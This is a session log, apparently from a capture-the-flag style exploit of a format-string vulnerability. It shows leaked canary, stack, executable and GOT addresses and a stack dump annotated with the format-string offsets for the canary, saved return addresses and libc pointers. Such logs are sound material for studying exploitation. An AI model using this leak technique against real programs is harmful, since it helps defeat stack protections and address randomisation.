[*] Canary: 0x6f859102fbd22200
[*] Stack leak: 0x7fffa98309a0
[*] Exe leak: 0x555fb2bc5283
[*] Got leak: 0x555fb2bc6010
[*] Switching to interactive mode
> %0$p
> 0x555fb2bc600b
> 0x71
> 0xffffffff
> 0x7fffa9830880
> (nil)
> 0xa70243625
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x34000000340
> 0x7fd21eb22e8d			# %17$s
> (nil)
> 0x7fd21ec816a0			# %19$p: stdin || stdout || stderr
> 0x1
> 0x7fd21ec81723			# %21$s
> 0xd68
> 0x7fd21eb24951			# %23$s
> 0xd68
> 0xa
> 0x7fd21ec816a0			# %26$p
> 0x555fb2bc6010			# %27$s
> 0x555fb2bc8010			# %28$p: GOT
> 0x7fd21ec7d4a0			# %29$s
> (nil)
> 0x7fd21eb24e93			# %31$s
> 0x26
> 0x7fd21ec816a0			# %33$s
> 0x555fb2bc6010			# %34$p
> 0x7fd21eb1859a			# %35$s
> 0x555fb2bc5300
> 0x7fffa98309a0
> 0x555fb2bc5100
> 0x6f859102fbd22200        # %39$p: canary
> 0x7fffa98309a0			# %40$p: saved_rbp of vuln
> 0x555fb2bc52de			# saved_rip of vuln: main + x -> x = 91
> (nil)
> 0x7fd21eab8083			# saved_rip of main: __libc_start_call_main+122
> 0x200000001
> 0x7fffa9830a98
> 0x11ec7c7a0
> 0x555fb2bc5283			# %47$p: main
> 0x555fb2bc5300
> 0x5f84e8222f180ddc
> 0x555fb2bc5100
> 0x7fffa9830a90
> (nil)
> (nil)
> 0xa07bbb243c780ddc
> 0xa020d5752f760ddc
> (nil)
> (nil)
> (nil)
> 0x1
> 0x7fffa9830a98
> 0x7fffa9830aa8
> 0x7fd21ecc0190			# %62$s
> (nil)
> (nil)
> 0x555fb2bc5100
> 0x7fffa9830a90
> (nil)
> (nil)
> 0x555fb2bc512e